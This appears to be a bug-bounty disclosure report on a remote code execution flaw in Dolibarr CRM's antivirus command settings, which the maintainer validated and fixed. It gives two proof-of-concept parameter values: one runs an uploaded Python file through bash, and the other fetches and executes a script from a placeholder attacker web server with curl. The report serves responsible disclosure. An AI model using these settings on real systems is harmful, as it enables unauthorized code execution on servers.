ANTIVIRUS Command Improper Input Validation leads to Remote Code Execution in dolibarr/dolibarr

Valid

Reported on

Feb 2nd 2023


Description

In Security setup, Dolibarr CRM has a feature that allow authenticated user to provide antivirus command (MAIN_ANTIVIRUS_COMMAND) and parameters (MAIN_ANTIVIRUS_PARAM). However, due to improper input validation, the web server allows malicious threat actor to execute malicious command that leads to Remote Code Execution

PoC and Exploit 1

  • PoC 1: Firstly, we upload malicious .py file (this web-app allows uploading .py file!), then set the MAIN_ANTIVIRUS_COMMAND=bash and MAIN_ANTIVIRUS_PARAM= -c 'python3 {fileName_uploaded_path}'
  • PoC_1_Video
  • PoC_1_exploit

PoC and Exploit 2

  • PoC 2: We execute malicious script from attacker's web server by setting MAIN_ANTIVIRUS_COMMAND=bash and MAIN_ANTIVIRUS_PARAM= -c "$(curl {ATTACKER_WEB_SERVER})"
  • PoC_2_Video
  • PoC_2_exploit

Impact

This vulnerability can leads to Remote Code Execution

Occurrences

Improper validation and filter in MAIN_ANTIVIRUS_PARAM parameter

We are processing your report and will contact the dolibarr team within 24 hours. a year ago
blakduk modified the report
a year ago
We have contacted a member of the dolibarr team and are waiting to hear back a year ago
blakduk
a year ago

Researcher


Hi @admin, It seems that the maintainer acknowledged this vulnerability and fixed but he did not update the dtatus of this report (https://github.com/Dolibarr/dolibarr/commit/954906ec4835e505806a51527a16e6648f618c0a)

Laurent Destailleur validated this vulnerability a year ago
blakduk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 18.0 with commit 61c734 a year ago
Laurent Destailleur has been awarded the fix bounty
antivir.class.php#L177 has been validated
This vulnerability has now been published 25 days ago
to join this conversation